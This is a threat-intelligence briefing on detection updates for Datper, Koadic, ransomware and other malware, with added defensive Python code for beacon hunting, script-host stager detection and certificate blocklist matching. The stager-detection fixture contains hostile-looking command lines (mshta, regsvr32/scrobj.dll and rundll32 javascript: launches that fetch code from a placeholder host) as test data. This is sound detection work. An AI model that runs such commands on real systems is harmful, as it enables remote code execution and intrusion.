J2 CSC September 4th Weekly Briefing
This week's threat intelligence update for our cybersecurity platform: be vigilant, be informed and be safe!
New Detection Technique - Datper
Datper has been observed in targeted attacks against Japanese organizations since around June 2016.
Datper infects systems either through drive-by download attacks or by exploiting vulnerabilities in asset management software.
Datper communicates with Command and Control servers using the HTTP protocol, limiting its communications to a specific time window.
We've added IDS signatures and the following correlation rule to detect this activity:
- System Compromise, Trojan infection, Datper
#Datper #Trojan infection
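The two network traits the briefing gives for Datper, HTTP command and control and traffic confined to a time window, are also what a beacon hunt over proxy logs looks for. The following is an added example, not the briefing's IDS content: for every (client, server) pair it measures how regular the request cadence is and reports the clock window the contacts fall in. The log lines are constructed, the thresholds (`min_hits`, `max_jitter`) are illustrative choices, and nothing in it is a Datper-specific indicator.

```python
"""Beacon hunting over HTTP proxy logs.

Added example for this briefing, not its IDS content: for every
(client, server) pair, measure how regular the request intervals are and
report the clock window the contacts fall in. Regular cadence inside a
bounded window is a generic C2 trait; nothing here is a Datper indicator,
and the log lines are constructed.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev
from typing import Dict, List, NamedTuple, Tuple


class Beacon(NamedTuple):
    client: str
    server: str
    count: int
    mean_interval_s: float
    jitter: float             # population stdev / mean of the gaps
    window: Tuple[str, str]   # first and last contact, HH:MM


# Constructed proxy log: "<ISO timestamp> <client> <server> <method> <uri>".
# 10.0.0.21 -> 203.0.113.5 checks in every ~5 minutes during one morning window;
# the other traffic is irregular browsing and a two-hit update check.
SAMPLE_LOG = """\
# timestamp client server method uri
2017-09-04T09:00:10 10.0.0.21 www.example.com GET /
2017-09-04T09:00:12 10.0.0.21 www.example.com GET /style.css
2017-09-04T09:02:00 10.0.0.21 203.0.113.5 POST /index.php
2017-09-04T09:03:40 10.0.0.21 www.example.com GET /news
2017-09-04T09:05:00 10.0.0.35 updates.example.net GET /check
2017-09-04T09:07:05 10.0.0.21 203.0.113.5 POST /index.php
2017-09-04T09:12:01 10.0.0.21 203.0.113.5 POST /index.php
2017-09-04T09:15:02 10.0.0.21 www.example.com GET /news/2
2017-09-04T09:15:03 10.0.0.21 www.example.com GET /img/a.png
2017-09-04T09:16:58 10.0.0.21 203.0.113.5 POST /index.php
2017-09-04T09:22:03 10.0.0.21 203.0.113.5 POST /index.php
2017-09-04T09:27:00 10.0.0.21 203.0.113.5 POST /index.php
2017-09-04T09:31:59 10.0.0.21 203.0.113.5 POST /index.php
2017-09-04T09:35:00 10.0.0.35 updates.example.net GET /check
2017-09-04T09:40:55 10.0.0.21 www.example.com GET /about
"""


def parse(text: str) -> List[Tuple[datetime, str, str]]:
    """Return (timestamp, client, server) per request; skips comments and blanks."""
    events = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, client, server, _method, _uri = line.split(maxsplit=4)
        events.append((datetime.fromisoformat(ts), client, server))
    return events


def find_beacons(events, min_hits: int = 5, max_jitter: float = 0.2) -> List[Beacon]:
    """Flag pairs with at least min_hits requests whose gaps vary by at most max_jitter."""
    by_pair: Dict[Tuple[str, str], List[datetime]] = defaultdict(list)
    for ts, client, server in events:
        by_pair[(client, server)].append(ts)

    found = []
    for (client, server), times in by_pair.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue  # all requests in the same second: a burst, not a beacon
        jitter = pstdev(gaps) / avg
        if jitter <= max_jitter:
            found.append(Beacon(client, server, len(times), round(avg, 1), round(jitter, 3),
                                (times[0].strftime("%H:%M"), times[-1].strftime("%H:%M"))))
    return found


if __name__ == "__main__":
    for b in find_beacons(parse(SAMPLE_LOG)):
        print(f"{b.client} -> {b.server}: {b.count} hits every ~{b.mean_interval_s}s "
              f"(jitter {b.jitter}), active {b.window[0]}-{b.window[1]}")
```

Ordinary browsing to www.example.com has far more than 20% variance between requests and is not reported, while the five-minute check-ins to 203.0.113.5 are, together with the 09:02 to 09:31 window they occupy. Running this over a full day and comparing windows across hosts is what separates a scheduled implant from a user who simply works set hours.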
New Detection Technique - Koadic
Koadic is a Windows post-exploitation toolkit, similar to other penetration testing tools such as Meterpreter and Powershell Empire.
What makes Koadic unique is that it performs most of its operations through Windows Script Host (JScript/VBScript), and its core is written to stay compatible with Microsoft operating systems from Windows 2000 through Windows 10.
We have added IDS signatures and the following correlation rule to detect this activity:
- System Compromise, Trojan infection, Koadic
#Koadic #Trojan infection
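Because Koadic lives in Windows Script Host, the IDS signatures above have a natural host-side complement: process-creation telemetry. The block below is an added example, not the briefing's content or Koadic's code. It runs a handful of generic WSH-abuse heuristics (script hosts launched with a URL, mshta with inline script, regsvr32 pulling a remote scriptlet through scrobj.dll, rundll32 with a javascript: payload, a script host spawning children, Office spawning a script host) over constructed Sysmon-style events; the rules are assumptions about how WSH-based stagers typically land, not Koadic signatures.

```python
"""Host-side hunt for Windows Script Host (WSH) stagers in process-creation logs.

Added example for this briefing, not its IDS content. Koadic-style toolkits
run JScript/VBScript through wscript, cscript or mshta, or through LOLBins
that can host a scriptlet (regsvr32 with scrobj.dll, rundll32 with a
javascript: URL). The rules below are generic WSH-abuse heuristics rather
than Koadic signatures, and the events are constructed.
"""
import re
from typing import Callable, List, NamedTuple, Tuple


class ProcEvent(NamedTuple):
    host: str
    parent: str    # full path of the parent image
    image: str     # full path of the new process
    cmdline: str


class Finding(NamedTuple):
    host: str
    rule: str
    cmdline: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed process-creation records (Sysmon event 1 style), tab separated:
# host, parent image, image, command line.
SAMPLE_EVENTS = """\
WS01\tC:\\Windows\\explorer.exe\tC:\\Windows\\System32\\mshta.exe\tmshta http://203.0.113.5:9999/stage
WS01\tC:\\Windows\\System32\\mshta.exe\tC:\\Windows\\System32\\cmd.exe\tcmd.exe /c whoami
WS02\tC:\\Windows\\explorer.exe\tC:\\Windows\\System32\\regsvr32.exe\tregsvr32 /s /n /u /i:http://203.0.113.5:9999/pkg.sct scrobj.dll
WS03\tC:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE\tC:\\Windows\\System32\\wscript.exe\twscript.exe C:\\Users\\bob\\AppData\\Local\\Temp\\inv.js
WS04\tC:\\Windows\\explorer.exe\tC:\\Windows\\System32\\rundll32.exe\trundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";document.write();h=new ActiveXObject("WScript.Shell")
WS05\tC:\\Windows\\System32\\services.exe\tC:\\Windows\\System32\\cscript.exe\tcscript.exe //nologo C:\\scripts\\inventory.vbs
"""


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# (description, predicate). Rules are evaluated independently, so one event
# can raise several findings.
RULES: List[Tuple[str, Callable[[ProcEvent], bool]]] = [
    ("script host launched with a remote URL",
     lambda e: basename(e.image) in SCRIPT_HOSTS and URL_RE.search(e.cmdline) is not None),
    ("mshta running inline JScript/VBScript",
     lambda e: basename(e.image) == "mshta.exe"
     and re.search(r"\b(javascript|vbscript):", e.cmdline, re.IGNORECASE) is not None),
    ("regsvr32 loading a remote scriptlet through scrobj.dll",
     lambda e: basename(e.image) == "regsvr32.exe"
     and "scrobj.dll" in e.cmdline.lower() and URL_RE.search(e.cmdline) is not None),
    ("rundll32 executing a javascript: payload",
     lambda e: basename(e.image) == "rundll32.exe" and "javascript:" in e.cmdline.lower()),
    ("script host spawned a child process",
     lambda e: basename(e.parent) in SCRIPT_HOSTS),
    ("Office application spawned a script host",
     lambda e: basename(e.parent) in OFFICE_APPS and basename(e.image) in SCRIPT_HOSTS),
]


def parse_events(text: str) -> List[ProcEvent]:
    """One ProcEvent per well-formed tab-separated line; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        parts = line.split("\t")
        if len(parts) == 4:
            events.append(ProcEvent(*parts))
    return events


def scan(text: str) -> List[Finding]:
    """Apply every rule to every event and collect the hits in log order."""
    findings = []
    for event in parse_events(text):
        for rule, predicate in RULES:
            if predicate(event):
                findings.append(Finding(event.host, rule, event.cmdline))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.host}: {f.rule}\n    {f.cmdline}")
```

The scheduled inventory script on WS05 (cscript launched by the service control manager with a local .vbs) produces no finding, which is the point of keying the rules on remote URLs, inline script and unusual parent/child pairs rather than on the script hosts themselves: WSH is used legitimately on most estates, so a bare "wscript.exe ran" alert would drown the analyst.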
New Detection Technique - Ransomware
In the past week, we've seen an uptick in ransomware activity in the wild.
We have added IDS signatures and the following correlation rule to detect a new ransomware family:
- System Compromise, Ransomware infection, SyncCrypt
We also added IDS signatures and updated correlation rules to better detect the following ransomware families:
- System Compromise, Ransomware infection, Cerber
- System Compromise, Ransomware infection, Mole
- System Compromise, Ransomware infection, Spora
#SyncCrypt #Cerber #Mole #Spora
New Detection Techniques
We've added the following correlation rules as a result of additional recent malicious activity:
- System Compromise, Trojan infection, MSIL/HookUp
- System Compromise, Trojan infection, StressHub
#MSIL/HookUp #StressHub
Updated Detection Technique - Exploit Kits
Exploit kits are the engine behind "drive-by downloads": attackers embed them in websites, invisibly to ordinary visitors.
When a user browses to a website hosting an exploit kit, the kit tries the exploits it carries against the visitor's browser and plugins and, on success, installs malware on the user's machine.
This approach is a common attack vector and a major source of infections for end users.
Cybercriminals constantly change the patterns they use within their code to evade detection.
We've added IDS signatures and updated the following correlation rules to improve exploit kit detection:
- Delivery & Attack, Malicious website - Exploit Kit, Malicious redirection
- Exploitation & Installation, Malicious website - Exploit Kit, Disdain EK
#Exploit Kits #Malicious redirection #Disdain
Updated Detection Technique - Malware SSL Certificates
We've added new IDS signatures covering the certificates that abuse.ch's SSL Blacklist identifies as associated with malware or botnet activity.
The updated correlation rule uses this information to detect command and control communications for several malware families:
- System Compromise, Command and Control Communication, Known malicious SSL certificate
#Malware SSL Certificates #Known malicious SSL certificate
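The abuse.ch list keys each malicious certificate by its SHA1 fingerprint, the SHA1 over the DER-encoded certificate, which is also the value Suricata's tls.fingerprint keyword compares. The block below is an added example, not the briefing's rules or abuse.ch's tooling: it parses a feed excerpt in the SSLBL CSV layout, normalises fingerprints whether they arrive bare or colon-separated, and matches observed server certificates against the list. The CSV rows and the "certificate" byte strings are constructed stand-ins (they are not real DER and not real listings); the real feed lives at https://sslbl.abuse.ch/ and is not fetched here.

```python
"""Match observed TLS server certificates against an abuse.ch SSLBL-style list.

Added example for this briefing, not its own rules. SSLBL lists the SHA1
fingerprint of each malicious certificate, i.e. SHA1 over the DER-encoded
certificate, which is the same value Suricata's tls.fingerprint keyword
matches on. The CSV excerpt and the "certificates" below are constructed
stand-ins (the byte strings are not real DER), not entries from the feed.
"""
import csv
import hashlib
import io
from typing import Dict, Iterable, List, NamedTuple, Tuple


class Listing(NamedTuple):
    listed: str   # listing date as given by the feed
    reason: str   # e.g. "Gozi C&C"


class Alert(NamedTuple):
    src: str
    dst: str
    fingerprint: str
    reason: str


def sha1_fingerprint(der: bytes, colons: bool = False) -> str:
    """SHA1 of the DER certificate; colons=True gives the OpenSSL/Suricata display form."""
    digest = hashlib.sha1(der).hexdigest()
    if colons:
        return ":".join(digest[i:i + 2] for i in range(0, 40, 2))
    return digest


def normalize(fp: str) -> str:
    """Accept 'aa:bb:..' or 'AABB..' (Suricata, OpenSSL, analyst paste) -> bare lowercase hex."""
    fp = fp.replace(":", "").strip().lower()
    if len(fp) != 40 or any(c not in "0123456789abcdef" for c in fp):
        raise ValueError("not a SHA1 fingerprint: %r" % fp)
    return fp


def load_sslbl(text: str) -> Dict[str, Listing]:
    """Parse the SSLBL CSV layout (Listingdate,SHA1,Listingreason); '#' lines are comments."""
    table: Dict[str, Listing] = {}
    for row in csv.reader(io.StringIO(text)):
        if not row or row[0].startswith("#"):
            continue
        listed, fp, reason = row[0].strip(), row[1], row[2].strip()
        table[normalize(fp)] = Listing(listed, reason)
    return table


def match_connections(connections: Iterable[Tuple[str, str, bytes]],
                      blocklist: Dict[str, Listing]) -> List[Alert]:
    """Alert on every connection whose server certificate is on the list."""
    alerts = []
    for src, dst, der in connections:
        hit = blocklist.get(sha1_fingerprint(der))
        if hit is not None:
            alerts.append(Alert(src, dst, sha1_fingerprint(der, colons=True), hit.reason))
    return alerts


# Constructed stand-ins for DER certificates (any bytes hash the same way).
CERT_A = b"\x30\x82\x01\x0a" + b"constructed certificate A"
CERT_B = b"\x30\x82\x01\x0a" + b"constructed certificate B"
CERT_C = b"\x30\x82\x01\x0a" + b"constructed certificate C (benign)"

# Constructed feed excerpt in the SSLBL CSV layout, listing A and B but not C.
# B is written upper-case to show that normalize() tolerates either case.
SAMPLE_SSLBL_CSV = """\
# abuse.ch SSLBL (constructed sample, not the real feed)
# Listingdate,SHA1,Listingreason
2017-08-29 08:13:01,{a},Gozi C&C
2017-09-01 14:42:10,{b},TorrentLocker C&C
""".format(a=sha1_fingerprint(CERT_A), b=sha1_fingerprint(CERT_B).upper())

# Constructed observations: (client, server:port, server certificate bytes).
OBSERVED = [
    ("10.0.0.21", "203.0.113.10:443", CERT_A),
    ("10.0.0.21", "198.51.100.7:443", CERT_C),
    ("10.0.0.35", "203.0.113.44:8443", CERT_B),
]


def run() -> List[Alert]:
    return match_connections(OBSERVED, load_sslbl(SAMPLE_SSLBL_CSV))


if __name__ == "__main__":
    for a in run():
        print(f"{a.src} -> {a.dst} cert {a.fingerprint}: {a.reason}")
```

In production the DER bytes come from whatever extracts server certificates on the wire (the IDS itself, or a TLS log that already carries the fingerprint), and the list is refreshed from the feed; the matching logic stays the same. Fingerprint matching only covers connections where the certificate is visible in the handshake, so it should sit next to, not replace, destination-based C2 rules.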
Updated Detection Technique - Remote Access Tools
The typical attack pattern is an initial exploit of a vulnerability followed by installation of malware.
This last step often delivers a Remote Access Tool (RAT) that gives the attacker control of the compromised machine.
We added IDS signatures and correlation rules to detect the following RAT activity:
- System Compromise, Malware RAT, KONNI
- System Compromise, Malware RAT, NanoCore
#RAT #KONNI #NanoCore
Updated Detection Technique - Ransomware
In the past week, we've seen an uptick in ransomware activity in the wild.
We've added IDS signatures and updated the following correlation rules to improve detection of these ransomware families:
- System Compromise, Ransomware infection, Cerber
- System Compromise, Ransomware infection, Defray
- System Compromise, Ransomware infection, Spora
- System Compromise, Ransomware infection, Torrentlocker
#Cerber #Defray #Spora #Torrentlocker
Updated Correlation Rules
We've updated the following correlation rules as a result of recent malicious activity:
- Delivery & Attack, Malicious website, Phishing activity
- Exploitation & Installation, Client Side Exploit - Known Vulnerability, Malicious Document
- Exploitation & Installation, Client Side Exploit - Known Vulnerability, MSXMLHTTP Request
- Exploitation & Installation, Service Exploit, Samba Username Map Script RCE (CVE-2007-2447)
- Exploitation & Installation, WebServer Attack, PHP-CGI exploit followed by web shell
- System Compromise, Malware infection, CoinMiner
- System Compromise, Targeted Malware, APT.9002
- System Compromise, Trojan infection, Generic PowerShell
- System Compromise, Trojan infection, Hancitor
#Phishing activity #Malicious Document #MSXMLHTTP Request #Samba Username Map Script RCE (CVE-2007-2447) #PHP-CGI exploit followed by web shell #CoinMiner #APT.9002 #Generic PowerShell #Hancitor